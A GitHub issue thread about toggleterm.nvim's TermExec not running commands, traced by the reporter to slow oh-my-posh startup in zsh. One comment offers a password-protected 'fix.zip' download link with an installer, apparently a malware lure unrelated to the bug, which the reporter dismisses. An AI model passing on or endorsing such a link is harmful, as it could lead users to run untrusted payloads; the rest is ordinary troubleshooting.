### ISSUE TITLE
[BUG] TermExec doesn't work unless ToggleTerm is run before

### ISSUE THREAD

**Issue by desdic** [akinsho/toggleterm.nvim#607]
### Is there an existing issue for this?

- [X] I have searched the existing issues

### Current Behavior

When I start neovim and run `:TermExec cmd='ls -latr'` it opens a window but does not run the command. If I run `:ToggleTerm` to open a terminal and then same command again to remove it .. aaand then run :TermExec cmd='ls -latr'`  then it outputs the ls. Its like the term:send(cmd) doesn't send the command unless ToggleTerm was run first

### Expected Behavior

that TermExec runs command on every run

### Steps To Reproduce

latest version (v2.12.0) from git and with default config (lazy)
```
return {
    "akinsho/toggleterm.nvim",
    cmd = { "ToggleTerm", "TermExec" },
    keys = {
        { "<c-t>", "<cmd>ToggleTerm<cr>", desc = "Toggle term" },
        { "<leader>tts", "<cmd>TermSelect<cr>", desc = "Toggle term select" },
    },
    version = "*",
    config = true,
}
```

### Environment

```Markdown
- OS:Arch
- neovim version:
NVIM v0.10.1
Build type: Release
- Shell:
zsh
```

### Anything else?

![notworking](https://github.com/user-attachments/assets/779541a4-89f3-4e97-895e-4d0a93617f67) when running TermExec
![working](https://github.com/user-attachments/assets/1001fe57-7c6c-4dec-b607-0a116ff5f9c1) when running TermExec after ToggleTerm

**Comment by Axolot5784** [comment]
Download 
https://www.mediafire.com/file/3hzk77cxvxc9nq2/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by desdic** [comment]
yeah I figued since this lua plugin does not need gcc

**Comment by desdic** [comment]
Maybe its not toggle term but neovim because reducing the code to

```lua
vim.cmd.vsplit()
vim.cmd.terminal()
vim.api.nvim_chan_send(vim.bo.channel, "echo hello\r\n")
vim.api.nvim_feedkeys("a", "t", false)
```

dosn't work either

**Comment by desdic** [comment]
no found the issue. The issue is that `oh-my-posh` in zsh is starting slow in the latest version so the command is sent to the terminal before the shell is spawned. Would it be possible to wait for the terminal to be ready ?

**Comment by desdic** [comment]
closing since it only happens with oh-my-posh
